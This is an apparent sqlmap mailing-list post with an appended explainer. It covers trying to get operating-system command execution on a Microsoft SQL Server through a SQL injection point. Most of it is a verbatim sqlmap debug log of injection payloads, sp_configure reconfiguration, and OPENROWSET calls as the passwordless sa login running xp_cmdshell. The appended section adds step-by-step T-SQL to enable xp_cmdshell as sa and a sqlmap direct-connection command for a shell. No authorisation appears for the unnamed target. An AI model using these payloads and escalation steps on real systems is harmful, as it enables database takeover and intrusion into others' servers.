Hey,
I am trying to write on MSSQL with either --os-shell or any other flag (none works for me).
I know that 'Ad Hoc Distributed Queries' are disabled -> OpenRowSet is disabled as well.
sqlmap initially gets into the DB as a secondary user; there are 2 users in the DB: SA, which is the administrator, and the other user, which sqlmap gets at start.
The password for sa is NULL (no password at all); I know that by executing --users --passwords.
So with all this data I am trying to run:
sqlmap -u "target" --risk=5 --level=5 --random-agent --threads=10 -o --os-shell --dbms-cred=sa: --fresh-queries -v3 --parse-errors -t traffic.txt --sql-file=/usr/share/sqlmap/procs/mssqlserver/configure_openrowset.sql
I also tried without the sql-file, as I guess sqlmap should try it by itself, but I get the same results.
So my guess is that sqlmap can't get into the 'sa' user, because if it could get in, it would enable the openrowset. Am I right?
I can send the traffic.txt privately.
**********************
sqlmap identified the following injection points with a total of 0 HTTP(s)
requests:
---
Place: GET
Parameter: keyword
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: keyword=f') AND 1202=1202 AND ('NhGb' LIKE 'NhGb
Vector: AND [INFERENCE]
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING
clause
Payload: keyword=f') AND 7343=CONVERT(INT,(SELECT
CHAR(113)+CHAR(115)+CHAR(103)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN
(7343=7343) THEN CHAR(49) ELSE CHAR(48)
END))+CHAR(113)+CHAR(121)+CHAR(119)+CHAR(117)+CHAR(113))) AND ('PGJx' LIKE
'PGJx
Vector: AND [RANDNUM]=CONVERT(INT,(SELECT
'[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: keyword=f'); WAITFOR DELAY '0:0:5'--
Vector: ; IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: keyword=f') WAITFOR DELAY '0:0:5'--
Vector: IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--
---
[03:57:43] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
[03:57:43] [INFO] executing SQL statements from given file(s)
[03:57:43] [ERROR] unresolved variable 'ENABLE' in SQL file
'/usr/share/sqlmap/procs/mssqlserver/configure_openrowset.sql'
do you want to provide the substitution values? [y/N] y
insert value for variable 'ENABLE': 1
[03:57:46] [DEBUG] executing SQL data execution query: 'EXEC
master..sp_configure 'show advanced options', 1; RECONFIGURE WITH OVERRIDE;
EXEC master..sp_configure 'Ad Hoc Distributed Queries', 1; RECONFIGURE WITH
OVERRIDE; EXEC sp_configure 'show advanced options', 0; RECONFIGURE WITH
OVERRIDE'
[03:57:46] [PAYLOAD] f');EXEC master..sp_configure 'SHOW advanced options',
1; RECONFIGURE WITH OVERRIDE; EXEC master..sp_configure 'Ad Hoc Distributed
Queries', 1; RECONFIGURE WITH OVERRIDE; EXEC sp_configure 'SHOW advanced
options', 0; RECONFIGURE WITH OVERRIDE--
[03:57:46] [WARNING] time-based comparison requires larger statistical
model, please wait..............................
[03:57:53] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[03:57:53] [WARNING] parsed DBMS error message:
'System.NullReferenceException: Object reference not set to an instance of
an object.'
[03:57:53] [DEBUG] done
EXEC master..sp_configure 'show advanced options', 1; RECONFIGURE WITH
OVERRIDE; EXEC master..sp_configure 'Ad Hoc Distributed Queries', 1;
RECONFIGURE WITH OVERRIDE; EXEC sp_configure 'show advanced options', 0;
RECONFIGURE WITH OVERRIDE: 'NULL'
[03:57:53] [DEBUG] going to use D:/Microsoft SQL
Server/MSSQL10_50.MSSQLSERVER/MSSQL/Log as temporary files directory
on Microsoft SQL Server 2005 and 2008, OPENROWSET function is disabled by
default. This function is needed to execute statements as another DBMS user
since you provided the option '--dbms-creds'. If you are DBA, you can
enable it. Do you want to enable it? [Y/n] Y
[03:59:06] [PAYLOAD] f');EXEC master..sp_configure 'SHOW advanced options',
1; RECONFIGURE WITH OVERRIDE; EXEC master..sp_configure 'Ad Hoc Distributed
Queries', 1; RECONFIGURE WITH OVERRIDE; EXEC sp_configure 'SHOW advanced
options', 0; RECONFIGURE WITH OVERRIDE--
[03:59:06] [WARNING] it is very important not to stress the network adapter
during usage of time-based payloads to prevent potential errors
[03:59:06] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[03:59:06] [WARNING] parsed DBMS error message:
'System.NullReferenceException: Object reference not set to an instance of
an object.'
[03:59:06] [INFO] testing if current user is DBA
[03:59:06] [PAYLOAD] f') AND 7808=CONVERT(INT,(SELECT
CHAR(113)+CHAR(115)+CHAR(103)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN
(IS_SRVROLEMEMBER(CHAR(115)+CHAR(121)+CHAR(115)+CHAR(97)+CHAR(100)+CHAR(109)+CHAR(105)+CHAR(110))=1)
THEN CHAR(49) ELSE CHAR(48)
END))+CHAR(113)+CHAR(121)+CHAR(119)+CHAR(117)+CHAR(113))) AND ('FSjT' LIKE
'FSjT
[03:59:06] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[03:59:06] [WARNING] parsed DBMS error message:
'System.Data.SqlClient.SqlException: Conversion failed when converting the
varchar value 'qsgjq0qywuq' to data type int.'
[03:59:06] [DEBUG] performed 1 queries in 0.13 seconds
[03:59:06] [WARNING] functionality requested probably does not work because
the curent session user is not a database administrator
[03:59:06] [DEBUG] creating a support table to write commands standard
output to
[03:59:06] [PAYLOAD] f');DROP TABLE sqlmapoutput--
[03:59:06] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[03:59:06] [WARNING] parsed DBMS error message:
'System.NullReferenceException: Object reference not set to an instance of
an object.'
[03:59:06] [PAYLOAD] f');CREATE TABLE sqlmapoutput(id INT PRIMARY KEY
IDENTITY, data NVARCHAR(4000))--
[03:59:06] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[03:59:06] [WARNING] parsed DBMS error message:
'System.NullReferenceException: Object reference not set to an instance of
an object.'
[03:59:06] [INFO] testing if xp_cmdshell extended procedure is usable
[03:59:06] [PAYLOAD] f');SELECT * FROM
OPENROWSET('SQLOLEDB','';'sa';'NULL','SET FMTONLY OFF DECLARE @ktdg
VARCHAR(8000);SET
@ktdg=0x6563686f2031203e2022443a2f4d6963726f736f66742053514c205365727665722f4d5353514c31305f35302e4d5353514c5345525645522f4d5353514c2f4c6f672f746d70636f6974652e74787422;EXEC
master..xp_cmdshell @ktdg')--
[03:59:06] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[03:59:06] [WARNING] parsed DBMS error message:
'System.Data.SqlClient.SqlException: SQL Server blocked access to STATEMENT
'OpenRowset/OpenDatasource' of component 'Ad Hoc Distributed Queries'
because this component is turned off as part of the security configuration
for this server. A system administrator can enable the use of 'Ad Hoc
Distributed Queries' by using sp_configure. For more information about
enabling 'Ad Hoc Distributed Queries', see "Surface Area Configuration" in
SQL Server Books Online.'
[03:59:06] [PAYLOAD] f');BULK INSERT sqlmapoutput FROM 'D:/Microsoft SQL
Server/MSSQL10_50.MSSQLSERVER/MSSQL/Log/tmpcoite.txt' WITH (CODEPAGE='RAW',
FIELDTERMINATOR='WaPrHIHUBH', ROWTERMINATOR='vOTmRkjwAa')--
[03:59:06] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[03:59:06] [WARNING] parsed DBMS error message:
'System.Data.SqlClient.SqlException: You do not have permission to use the
bulk load statement.'
[03:59:06] [PAYLOAD] f');SELECT * FROM
OPENROWSET('SQLOLEDB','';'sa';'NULL','SET FMTONLY OFF DECLARE @wgiw
VARCHAR(8000);SET
@wgiw=0x64656c202f46202f5120443a5c4d6963726f736f66742053514c205365727665725c4d5353514c31305f35302e4d5353514c5345525645525c4d5353514c5c4c6f675c746d70636f6974652e747874;EXEC
master..xp_cmdshell @wgiw')--
[03:59:06] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[03:59:07] [WARNING] parsed DBMS error message:
'System.Data.SqlClient.SqlException: SQL Server blocked access to STATEMENT
'OpenRowset/OpenDatasource' of component 'Ad Hoc Distributed Queries'
because this component is turned off as part of the security configuration
for this server. A system administrator can enable the use of 'Ad Hoc
Distributed Queries' by using sp_configure. For more information about
enabling 'Ad Hoc Distributed Queries', see "Surface Area Configuration" in
SQL Server Books Online.'
[03:59:07] [PAYLOAD] f') AND 9097=CONVERT(INT,(SELECT
CHAR(113)+CHAR(115)+CHAR(103)+CHAR(106)+CHAR(113)+(SELECT
ISNULL(CAST(COUNT(data) AS NVARCHAR(4000)),CHAR(32)) FROM
sqlmapoutput)+CHAR(113)+CHAR(121)+CHAR(119)+CHAR(117)+CHAR(113))) AND
('tzMl' LIKE 'tzMl
[03:59:07] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[03:59:07] [WARNING] parsed DBMS error message:
'System.Data.SqlClient.SqlException: Conversion failed when converting the
nvarchar value 'qsgjq0qywuq' to data type int.'
[03:59:07] [PAYLOAD] f') AND UNICODE(SUBSTRING((SELECT
ISNULL(CAST(COUNT(id) AS NVARCHAR(4000)),CHAR(32)) FROM
sqlmapoutput),1,1))>51 AND ('EirG' LIKE 'EirG
[03:59:07] [PAYLOAD] f') AND UNICODE(SUBSTRING((SELECT
ISNULL(CAST(COUNT(id) AS NVARCHAR(4000)),CHAR(32)) FROM
sqlmapoutput),1,1))>54 AND ('EirG' LIKE 'EirG
[03:59:07] [PAYLOAD] f') AND UNICODE(SUBSTRING((SELECT
ISNULL(CAST(COUNT(id) AS NVARCHAR(4000)),CHAR(32)) FROM
sqlmapoutput),1,1))>56 AND ('EirG' LIKE 'EirG
[03:59:07] [PAYLOAD] f') AND UNICODE(SUBSTRING((SELECT
ISNULL(CAST(COUNT(id) AS NVARCHAR(4000)),CHAR(32)) FROM
sqlmapoutput),1,1))>57 AND ('EirG' LIKE 'EirG
[03:59:07] [INFO] retrieved:
[03:59:07] [DEBUG] performed 4 queries in 0.38 seconds
[03:59:07] [WARNING] multi-threading is considered unsafe in time-based
data retrieval. Going to switch it off automatically
[03:59:07] [PAYLOAD] f') IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(COUNT(id)
AS NVARCHAR(4000)),CHAR(32)) FROM sqlmapoutput),1,1))>51) WAITFOR DELAY
'0:0:5'--
[03:59:07] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[03:59:07] [WARNING] parsed DBMS error message:
'System.NullReferenceException: Object reference not set to an instance of
an object.'
[03:59:07] [PAYLOAD] f') IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(COUNT(id)
AS NVARCHAR(4000)),CHAR(32)) FROM sqlmapoutput),1,1))>48) WAITFOR DELAY
'0:0:5'--
[03:59:08] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[03:59:08] [WARNING] parsed DBMS error message:
'System.NullReferenceException: Object reference not set to an instance of
an object.'
[03:59:08] [PAYLOAD] f') IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(COUNT(id)
AS NVARCHAR(4000)),CHAR(32)) FROM sqlmapoutput),1,1))>1) WAITFOR DELAY
'0:0:5'--
[03:59:13] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[03:59:13] [WARNING] parsed DBMS error message:
'System.NullReferenceException: Object reference not set to an instance of
an object.'
do you want sqlmap to try to optimize value(s) for DBMS delay responses
(option '--time-sec')? [Y/n] y
[04:00:34] [PAYLOAD] f') IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(COUNT(id)
AS NVARCHAR(4000)),CHAR(32)) FROM sqlmapoutput),1,1))>47) WAITFOR DELAY
'0:0:5'--
[04:00:39] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[04:00:39] [WARNING] parsed DBMS error message:
'System.NullReferenceException: Object reference not set to an instance of
an object.'
[04:00:39] [PAYLOAD] f') IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(COUNT(id)
AS NVARCHAR(4000)),CHAR(32)) FROM sqlmapoutput),1,1))!=48) WAITFOR DELAY
'0:0:5'--
[04:00:39] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[04:00:39] [WARNING] parsed DBMS error message:
'System.NullReferenceException: Object reference not set to an instance of
an object.'
[04:00:39] [PAYLOAD] f') IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(COUNT(id)
AS NVARCHAR(4000)),CHAR(32)) FROM sqlmapoutput),2,1))>51) WAITFOR DELAY
'0:0:5'--
[04:00:40] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[04:00:40] [WARNING] parsed DBMS error message:
'System.NullReferenceException: Object reference not set to an instance of
an object.'
[04:00:40] [PAYLOAD] f') IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(COUNT(id)
AS NVARCHAR(4000)),CHAR(32)) FROM sqlmapoutput),2,1))>48) WAITFOR DELAY
'0:0:5'--
[04:00:40] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[04:00:40] [WARNING] parsed DBMS error message:
'System.NullReferenceException: Object reference not set to an instance of
an object.'
[04:00:40] [PAYLOAD] f') IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(COUNT(id)
AS NVARCHAR(4000)),CHAR(32)) FROM sqlmapoutput),2,1))>1) WAITFOR DELAY
'0:0:5'--
[04:00:40] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[04:00:40] [WARNING] parsed DBMS error message:
'System.NullReferenceException: Object reference not set to an instance of
an object.'
[04:00:40] [INFO] retrieved: 0
[04:00:40] [DEBUG] performed 8 queries in 92.65 seconds
[04:00:40] [PAYLOAD] f');DELETE FROM sqlmapoutput--
[04:00:40] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[04:00:40] [WARNING] parsed DBMS error message:
'System.NullReferenceException: Object reference not set to an instance of
an object.'
[04:00:40] [ERROR] it seems that the temporary directory ('D:/Microsoft SQL
Server/MSSQL10_50.MSSQLSERVER/MSSQL/Log') used for storing console output
within the back-end file system does not have writing permissions for the
DBMS process. You are advised to manually adjust it with option --tmp-path
switch or you will not be able to retrieve the commands output
[04:00:40] [INFO] going to use xp_cmdshell extended procedure for operating
system command execution
[04:00:40] [INFO] calling Windows OS shell. To quit type 'x' or 'q' and
press ENTER
os-shell> x
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
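The steps that sqlmap's --os-shell attempts against this MSSQL target, written out as plain T-SQL so each one can be checked by hand instead of inferred from HTTP status codes. This is an added example, not code from the original post or from sqlmap itself: the 'sa' login with an empty password is taken from the post above; the xp_cmdshell command and the idea of running these statements in a lab instance are illustrative assumptions. Three facts from the log drive the checks: sqlmap's "testing if current user is DBA" payload (IS_SRVROLEMEMBER('sysadmin')) came back 0, OPENROWSET was refused because 'Ad Hoc Distributed Queries' is off, and every stacked-query payload, including the plain DROP TABLE, produced the same NullReferenceException 500, so that 500 says nothing about whether sp_configure actually ran.

```sql
-- Added example, not from the original post or from sqlmap. Run inside the
-- injected session (stacked queries work on this target) or in SSMS on a lab
-- instance. 'sa' with an empty password comes from the post; the xp_cmdshell
-- command is an assumption for illustration.

-- 1. What the injected login is allowed to do. sqlmap's "is DBA" test is
--    IS_SRVROLEMEMBER('sysadmin'); the log shows it returned 0.
--    sp_configure + RECONFIGURE need the server-level ALTER SETTINGS
--    permission; BULK INSERT needs ADMINISTER BULK OPERATIONS, which the
--    "You do not have permission to use the bulk load statement" error
--    in the log says is missing.
SELECT SYSTEM_USER                                                 AS login_name,
       IS_SRVROLEMEMBER('sysadmin')                                AS is_sysadmin,
       HAS_PERMS_BY_NAME(NULL, NULL, 'ALTER SETTINGS')             AS can_reconfigure,
       HAS_PERMS_BY_NAME(NULL, NULL, 'ADMINISTER BULK OPERATIONS') AS can_bulk_load;

-- 2. Current state of the options sqlmap depends on (value_in_use = 1 means
--    on). Reading sys.configurations does not require running sp_configure,
--    so this is the way to verify whether step 3 changed anything.
SELECT name, value, value_in_use
FROM   sys.configurations
WHERE  name IN ('show advanced options', 'Ad Hoc Distributed Queries', 'xp_cmdshell');

-- 3. The enable sequence sqlmap sends (configure_openrowset.sql with
--    ENABLE=1). It only succeeds when step 1 shows can_reconfigure = 1;
--    otherwise SQL Server raises error 15247 ("User does not have permission
--    to perform this action") and nothing changes. The web application in the
--    log hides that outcome behind a generic 500, so rerun step 2 afterwards.
EXEC master..sp_configure 'show advanced options', 1;      RECONFIGURE WITH OVERRIDE;
EXEC master..sp_configure 'Ad Hoc Distributed Queries', 1; RECONFIGURE WITH OVERRIDE;
EXEC master..sp_configure 'show advanced options', 0;      RECONFIGURE WITH OVERRIDE;

-- 4. The loopback OPENROWSET sqlmap uses to act as 'sa' once step 3 has
--    taken effect: '' as data source means this instance, 'sa' plus the
--    empty password from the post, and xp_cmdshell is switched on inside the
--    sa session before it is called (sa is sysadmin, so that is allowed).
--    Chicken-and-egg: this very call is the statement that the "blocked
--    access to STATEMENT 'OpenRowset/OpenDatasource'" error refuses while
--    'Ad Hoc Distributed Queries' is off, so sa's empty password cannot be
--    used through this path to turn the option on; the injected login itself
--    needs ALTER SETTINGS for that.
SELECT * FROM OPENROWSET('SQLOLEDB', '';'sa';'',
    'SET FMTONLY OFF;
     EXEC master..sp_configure ''show advanced options'', 1; RECONFIGURE WITH OVERRIDE;
     EXEC master..sp_configure ''xp_cmdshell'', 1;           RECONFIGURE WITH OVERRIDE;
     EXEC master..xp_cmdshell ''whoami'';');
```

If step 1 reports can_reconfigure = 0, the sp_configure route through the injection is closed regardless of what sa's password is. The empty sa password only helps where a direct TDS connection to the database port is possible from the tester's host (assumed here, not shown in the post); in that case sqlmap's direct-connection mode, `sqlmap -d "mssql://sa:@<host>:1433/master" --os-shell`, logs in as sysadmin and needs none of the OPENROWSET steps above.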